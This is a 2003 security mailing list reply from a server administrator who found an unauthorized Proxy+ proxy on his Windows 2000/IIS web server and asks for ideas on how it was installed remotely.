Re: Proxy+ Trojan

From: Bill (proftpd@anatek.com)
Date: 02/04/03

  • Next message: Tim Warren: "Alternative ssh use questions" 
    From: "Bill" <proftpd@anatek.com>
To: <security-basics@securityfocus.com>
Date: Mon, 3 Feb 2003 18:57:45 -0600

    Hamish,

    Sorry, I should have provided a better desicription to begin.

    > The simple answer is find out how it was put on there, and block off that

    That's the problem -- it's not so simple. This is a dedicated web server
    (Win2K/IIS5) that I have co-located in a top-tier data center. The app was
    installed remotely, and no logins were compromised. I had just finished
    having my SQL Server harded (about 10 days _before_ Slammer!) and we ran
    some extensive password cracking software then. I was feeling pretty ok,
    and then I started getting SpamCop reports. I checked for an open relay a
    hundred times, but couldn't find anything. After a couple of days I found
    the copy of Proxy+ and blew it away. I then installed a software firewall,
    and I'm ok now (except for learning how to configure the firewall :-) ).

    The real problem is that I don't know how this install was done. I would
    really like to address this as an independent issue. I must have something
    configured horribly wrong, but how do I start the detective work? And now,
    everything seems suspicious. I feel the urge to disable every service! :-)

    Anyhow, if you have ideas on how an app could get installed remotely, I
    could start investigating.

    > Then do a security audit on that machine.

    I hae subscribed to the SecurityMetrics offering, which I think will
    definitely help on an ongoing basis. But my situation is not ideal. I'm
    misconfigured, I'm sure, but hadnling it with a firewall. I want to be
    correctly configured and have the firewall as an extra measure of safety.

    I would enjoy hearing your speculation!

    Thanks!

    Bill

    • Quantcast